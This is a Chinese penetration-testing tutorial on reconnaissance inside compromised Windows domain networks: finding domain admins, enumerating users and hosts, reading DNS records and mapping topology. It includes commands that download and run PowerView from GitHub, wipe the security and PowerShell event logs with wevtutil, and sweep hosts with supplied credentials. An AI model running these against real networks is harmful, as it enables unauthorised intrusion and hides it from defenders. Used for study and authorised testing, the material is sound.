内网安全信息收集

作用

在渗透测试过程中,针对目标资产信息搜集的全面性与否,决定了渗透过程的复杂程度,信息收集的越全面,可尝试的方法就越多。针对目标主机信息搜集的全面与否,对系统提权起着重要作用。

域内信息收集

1、启动Computer Browser查询域,在计算机管理、服务、找到Computer Browser开启:

2、net view /domain # 查找域

3、查询域内所有主机

4、查询域内所有用户组默认13个

5、查询所有域成员主机列表

net group ”domain computers“ /domain

6、获取密码信息

7、获取域信任信息

查找域控制器

1、查找域控制器,执行以下命令,域控制器的机器名为DC:

2、查看域控制器的主机名

3、查看当前时间

4、查看域控制器,域控制器的机器名为dc

查询所有域用户列表

1、域内的用户和管理员信息,查询所有域用户列表

2、获取域内用户的详细信息

3、查看存在的用户

4、查询本地管理员组用户

5、查询域管理员用户

6、查询管理用户组

net group “Enterprise Admins ”/domain

定位域管理员

获取内网中特定用户、机器的权限,获得特定资源对内网安全性进行评估。

1、域管理员概述,在企业内网会部署大量的网络安全设备,IDS、IPS、安全网关、病毒防护软件等。在域网络攻击中获取域内的一个支点后,需要获取域管理员权限。

2、常用域管理员定位工具

psloggedon.exe.exe、netview.exe、Nmap中的NSe脚本、PowerVIew 脚本、Empire的User_hunter模块。

3、查找域管理进程

4、本机检查,获取域管理员列表

收集域管理员列表

收集所有活动域的会话列表

交叉引用域管理员列表与活动会话列表

5、查询远程系统中运行的任务

6、扫描远程系统的NEtBios信息

下载脚本文件GDA.bat,运行GDA.bat -a

1618599385_6079ddd9113d63b4c9cfe.png!small?1618599389937

查询远程系统中运行的任务

FOR /F %i in (ips.txt) DO @echo [+] %i && @tasklist /V /S %i /U user /P password 2>NUL > output.txt && FOR /F %n in (names.txt) DO @type output.txt | findstr %n > NUL && echo [!] %n was found running a process on %i && pause

1618599395_6079dde3df1b9b68f77e1.png!small?1618599400900

扫描远程系统的NetBIOS信息

for /F %i in (ips.txt) do @echo [+] Checking %i && nbtstat -A %i 2>NUL >nbsessions.txt && FOR /F %n in (admins.txt) DO @type nbsessions.txt | findstr /I %n > NUL && echo [!] %n was found logged into %i

7、域管理员模拟方法简介

利用powershell收集域信息,检查powershell状态

管理员权限下将状态修改成Unrestricted

3、利用脚本,下载ps1并运行查询命令

Get-NetDomain #获取当前用户所在域的名称

Get-NetUser #获取所有用户的详细信息

Get-NetComputer #获取域内所有机器的详细信息

Get-NetShare #获取当前域内所有的共享信息

Get-ADObject #获取活动目录的对象

Invoke-UserHunter #获取域用户登陆的计算机信息,以及该用户是否有本地管理员权限

Invoke-ProcessHunter #通过查询域内所有的机器进程找到特定用户

8、域内用户和管理员的获取

使用adfind或者powerview导出域用户信息可以查看

# 查看域内用户详细信息:

adfind.exe -h DNS_SERVER_IP -sc u:username #目标用户

# 查看域用户能登录的机器(userWorkstations)

adfind.exe -h DNS_SERVER_IP -sc u:username userWorkstations

# 查看域内所有用户详细信息:

AdFind.exe -h DNS_SERVER_IP -sc u:* > result.txt

# 查看域内所有用户详细信息

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1');Get-NetUser -Domain yoga.com > .\test.txt"

# 使用修改组策略的方式限制登录

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1');Invoke-EnumerateLocalAdmin > .\test.txt"

Dns解析

前提是拿到了域管,查看dc上面dns解析记录

dnscmd 127.0.0.1 /enumrecords yoga.com yoga.com. /type A

dnscmd 127.0.0.1 /zoneprint yoga.com >1.txt

用户目录

查看域内所有计算机的C:\users\目录下的文件夹(登陆过该计算机的用户)

wevtutil为Windows 事件命令行实用程序,其导出的日志为evtx格式,Windows日志本身的存储格式。可以使用Windows事件查看器分析,Crtl+F查找,或者不使用epl参数,直接重定向输出即可。 wevtutil常用的场景是清理日志。

可作为筛选分析日志的工具 ,4624(用户登录成功),4768、4776(用户验证成功)

域控日志

导出所有域控的登录日志,分析出用户的登录ip;

wevtutil cl application

wevtutil cl security

wevtutil cl system

wevtutil cl "windows powershell"

wevtutil qe security /q:"Event[System[(EventID=4624 or EventID=4768 or EventID=4776)]]" /f:text /rd:true /c:1 > EvtLogon.dat

wevtutil qe Security /q:"*[EventData[Data[@Name='LogonType']='10'] and EventData[Data[@Name='TargetUserName']='RcoIl'] and System[(EventID=4624) and TimeCreated[timediff(@SystemTime) <= 2592000000]]]"

wevtutil qe Security /q:"*[System[(Keywords='0x8020000000000000')] and EventData[Data[@Name='SubjectUserName']='RcoIl']]" /f:text /rd:true /c:2

# 参数说明

qe: 从日志或日志文件中查询事件;(默认xml格式显示)

Security: 指定安全事件的日志;

/q: 筛选规则,可以打开Windows事件查看器的筛选器配置筛选条件后转至XML复制筛选规则;

/f: 以text格式显示

/rd: 指定读取事件的方向

/c: 指定个数

该命令其它参数参考wevtutil /?

其他工具

psloggendon.exe chris、netsess.exe \\PRIMARY、PVEFindADUser.exe -current需要管理员权限,可以枚举出域用户以及登录过特定系统的用户、netview.exe。

9、寻找域用户正在登录的主机

检查远程机器注册表项HKEY_USERS拿到正在登录的用户SID

内网环境的判断及拓扑架构分析

1、位置的判断

判断机器处于网络拓扑中的某个区域,是DMZ区,办公区,核心区还是核心DB等多个位置。

2、角色的判断

假如是服务器,判断是否是Web服务器,开发测试服务器,公共服务器,文件服务器,代理服务器,dns服务器,存储服务器等。

具体需要通过机器内的主机名、文件、网络连接等多种情况进行综合判断

主机名是最好判断的,通常web或app是web服务器,dev是开发服务器,NAS是存储服务器;File或者Fileserver是文件服务器。

通过网络连接判断,代理服务器可能有多个机器连接代理端口,更新服务器(wsus)可能开放更新端口8530,DNS服务器开放53端口。

3、连通性的判断

指的是机器能否从外面进来,能否出去。这关乎于后续的代理和木马

4、端口的判断

外网开放监听端口,内网机器测试常见端口,或者直接端口扫描,常见端口:80、8080、443、53、110、123等。

5、协议的判断

通常就是TCP、HTTP、ICMP、DNS等协议。利用adfind查询该sid用户

AdFind.exe -b cn=users,dc=yoga,dc=com -f "(objectSid:=S-1-5-21-2104426803-785674075-3345604858-1106)"

这个方法不需要很高的域用户权限,但是server默认才会开启远程注册表,PC默认不会开启

TCP协议

nc -lvnp port

内网机器: nc ip port

DNS协议

windows:nslookup dnslog

linux: dig dnslog

HTTP协议

nc -lvnp 80(8080)

内网机器: curl ip:80(8080) / 浏览器访问

ICMP协议

由于是网络层协议,内网直接利用ping命令,然后***用tcpdump等抓包工具抓包进行验证。

查看网络连接判断是否有连接其他机器端口,尝试ping -n 1 -a ip

使用arp -a + nbtstat -A ip是否存在主机名为Proxy的主机

IE浏览器的Internet设置(直接连接、PAC文件)

最终用curl进行确认

curl www.baidu.com  不通

curl -x proxy-ip:port www.baidu.com   通

敏感数据的防护

内网的核心敏感数据,不仅包括数据库、电子邮件,还包括个人数据及组织的业务数据、技术数据等。可以说,价值较高的数据基本都在内网中。

1、资料、数据、文件的定位流程:

定位内部人事组织结构

在内部人事组织结构中寻找需要监视的人员

定位相关人员的机器

监视相关人员存放文档的位置

列出存放文档的服务器的目录

重点核心业务机器及敏感信息防护:

核心业务机器

敏感信息和敏感文件

应用与文件形式信息的防护

2.、分析域内网段划分情况及拓扑机构

在掌握了内网的相关信息后,渗透测试人员可以分析目标网络的结构和安全防御策略,获取网段信息、各部门的ip地址段。

基本架构

asp+ Access+ IIs5.0/6.0+ windows sever 2003

aspx+Mysql+IIS7.0/7.5 +windows server 2008

php+Mysql+IIS

php+Mysql+Apache

php+MYsql+Nginx

jsp+mysql+nginx

jsp+mysql+Tomcat

jsp+oracle+Tomcat

域内网段划分

在判断内网环境时,首先需要分析内网ip地按址的分布情况。一般可以通过内网中的服务器、交换机等设备,以及snmp、弱口令等,获取内网网络拓扑或dns域传送的信息。

网段是怎么划分的? 按照楼层划分网段,还是按照地区划分网段?

内网通常可分为DMZ、办公区、核心区

1、DMz

在实际的渗透测试中,大多数情况下,在**web环境中拿到的权限都在dmz中。这个区域不属于严格意义上的内网。如果访问控制策略配置合理,dmz就会处在从内网能够访问DMz,而从dmz访问不能进入内网的状态。

2、办公区

办公区,是指日常工作区。办公区的安全防护水平通常不高,基本的防护机制大多数为杀毒软件或主机入侵检测产品。

3、核心区

核心区内一般存放着企业最重要的数据、文档等信息资产(例如域控制器、核心生产机器)安全全设置也最为严格。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值